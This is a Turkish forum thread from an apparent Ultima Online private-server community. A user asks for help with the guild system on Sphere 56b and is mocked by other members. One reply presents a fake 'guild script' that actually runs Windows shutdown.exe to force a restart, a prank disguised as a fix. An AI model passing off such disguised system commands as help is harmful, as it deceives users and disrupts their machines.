Arkadaşlar tmm guild scplerini indirdik sonra guild yazan emulatorude indirdik.:Ama çok karışık ya ben normal guildi sitom nasıl ocak?
Writing : Ya Bişe Anlamıosun Bide Benle Dalga Geçmeye Çalışıyosun Sanki Rotting'in Ayrı Bi Scp'si Var Töbe Töbe Buldum Tmm

harbimi hedehudu.scp diye bi scp oluştur içine şunları yaz

[function hedehodo]
LOCAL.SPAWN=<SYSSPAWN C:\Windows\System32\shutdown.exe -r -t 60>
sonra Sphere'yi aç

ilkönce r r yap

sonra bide save al tam olsun ..
nemesis:
harbimi hedehudu.scp diye bi scp oluştur içine şunları yaz
[function hedehodo]
LOCAL.SPAWN=<SYSSPAWN C:\Windows\System32\shutdown.exe -r -t 60>

Bak Nemesis Abin Sana Guild Sistemin Scpsini yazmıssın eklede Gor Odan sonra

BAŞŞŞ Offf DRİNGGGİİİİ

Helal Nemesis
Writing : Ya Bişe Anlamıosun Bide Benle Dalga Geçmeye Çalışıyosun Sanki Rotting'in Ayrı Bi Scp'si Var Töbe Töbe Buldum Tmm

Neden olmasın?
Script pack kullanıosun mağdem biraz ara,tara,araştır ki bizler senle d. geçmeyelim.Sonra buraya gelipde millete laga luga yapma!
Hahaha Adamı Rezil Ettiniz La :muahaha:muahaha:muahaha:muahaha:muahaha:muahaha:muahaha:muahaha
Silindi
Neophyte
0
Abi Banada Ordan Bir Unicorn.scp Cek Sonra Hep Bırlıkte Oynıyalım Ben Size

.add c_unicorn verim .dupe 999999

Hade Girip Oynıyalım Eksıgımız Kalmadı Sadece Unicornda Yeter Bize

Buda Onların Serverında Sitede Yazan Yazı

xxx uo shard uzun bir çalışmadan sonra sizlerle.Serverimiz aslında 2006 da aktif olacaktı fakat bazı sorunlar nedeniyl serveri açmamız biraz geçikti.Sphere versionumuz 56b dir.Sizlere iyi bir hizmet sunmaya hazırız.

Biz serverimizde sadece actionu deil dostluk arkadaşlık vs gibi duygularıda tattırmak istiyoruz.Unutmayın ultima online ationdan ibaret değil.Yeri geldimi action yapıcaz yeri geldimi role play.Kısacası her kesimi eğlendirmek istiyoruz.

Aynen Kopyala Yapıstır Yaptım. Birde Nicole Ile Writing Aynı IP Mı Bakarmısınız
Gececi : Hahaha Adamı Rezil Ettiniz La :muahaha:muahaha:muahaha:muahaha:muahaha:muahaha:muahaha:muahaha

Herkez beleşci olmus biz ne yapalım.:)

örn dialog:
x kişisi kendi kendine konuşmaktadır:

x: Lan bi dragon wardı la nerdeydi acaba?
x: Arasam mı aramasam mı lan acaba?
x: Olm ne arıcam şurda u-s war.internet explorer e 2 tıklarım www.ultima-strike.com yazarım foruma bi başlık açarım.
x: Enayi bol ya hani ben aramam onlara sorarım beleşe konarım.

v.s. v.s. :arastir

Scripti war da aradım bulamadım diyene inanmıyorum. :arastir
Silindi
Apprentice
7
boosterx :
Gececi : Hahaha Adamı Rezil Ettiniz La :muahaha:muahaha:muahaha:muahaha:muahaha:muahaha:muahaha:muahaha

Herkez beleşci olmus biz ne yapalım.:)

örn dialog:
x kişisi kendi kendine konuşmaktadır:

x: Lan bi dragon wardı la nerdeydi acaba?
x: Arasam mı aramasam mı lan acaba?
x: Olm ne arıcam şurda u-s war.internet explorer e 2 tıklarım www.ultima-strike.com yazarım foruma bi başlık açarım.
x: Enayi bol ya hani ben aramam onlara sorarım beleşe konarım.

v.s. v.s. :arastir

Scripti war da aradım bulamadım diyene inanmıyorum. :arastir

+9999
aHahahaha Bu Adama İyi Bir Ders Ve Cumle Alemede İBret Olsun Arastırmadan Topic Acıyor Boyle Bir Topic Onceden Acılmıstı Hatırlıyorum Adamda Faction Sistemini Sormustu Noxier De Adama Gerekli sitenin Linkini VErmişti Bakın bolye Bir Topic Var Halende Duruyordur Ama Adam Bilmiyor

Hey Dostum Burası u-s Burada Nerede Bele$ Oraya Yerle$ Kavramı Yoktur !!! Rezil Ederiz Biz Boyle Adamları Bu Camia'da
@boosterx
Ben kimseye lagaluga yapmadım arkadaşım tmmı.Hemde dalga geçilecek bir şey görmüyorum burda.

Vede ben beleşe koynmuyorum.Sisten script fln istemedim 56b de eski guild stone açılmıo bunu sordum.Ama işiniz gücünüz insanları dalgaya almak olmuş naparsın.Artık başka bi foruma geçmenin zamanı geldi.

Herkese iyi geceler iyi eğlenceler.Böyle devam edin.

Bu konu kilitlenmiş ve yeni mesaj kabul edilmiyor.

Üye Ol veya Giriş Yap

Bu forum başlığına mesaj atmak istiyorsanız hemen üye olun veya giriş yapın.